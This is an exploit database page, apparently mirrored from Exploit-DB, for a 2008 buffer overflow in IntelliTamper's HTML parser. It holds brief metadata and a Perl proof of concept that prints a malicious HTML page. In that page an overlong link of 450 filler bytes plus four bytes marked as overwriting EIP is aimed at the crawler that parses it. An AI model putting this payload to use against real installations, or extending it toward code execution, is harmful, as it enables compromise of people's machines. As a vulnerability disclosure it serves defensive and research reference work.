header-logo
Suggest Exploit
vendor:
IntelliTamper
by:
k`sOSe
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: IntelliTamper
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

k`sOSe

This exploit is a buffer overflow vulnerability in the html parser of IntelliTamper. It can be exploited by putting a properly formatted html file in a website and launching IntelliTamper against it.

Mitigation:

Ensure that all user-supplied input is properly validated and sanitized.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# k`sOSe - 07/21/2008
#
# This is NOT http://secunia.com/advisories/20172/.
# There are some BOFs in the html parser, just put a properly
# formatted html file in your website and launch IntelliTamper against it.

use warnings;
use strict;

my $evil_html   =       '<html><head><title>ph33r</title></head><body>' .
                        '<a href="http://google.it/' .
                        "\x41" x 450 .
                        "\x42" x 4 . # EIP
                        '.htm">ph33r</a>' .
                        "</body></html>";

print $evil_html;

# milw0rm.com [2008-07-21]

Navigation

Suggest Exploit

Services By CQR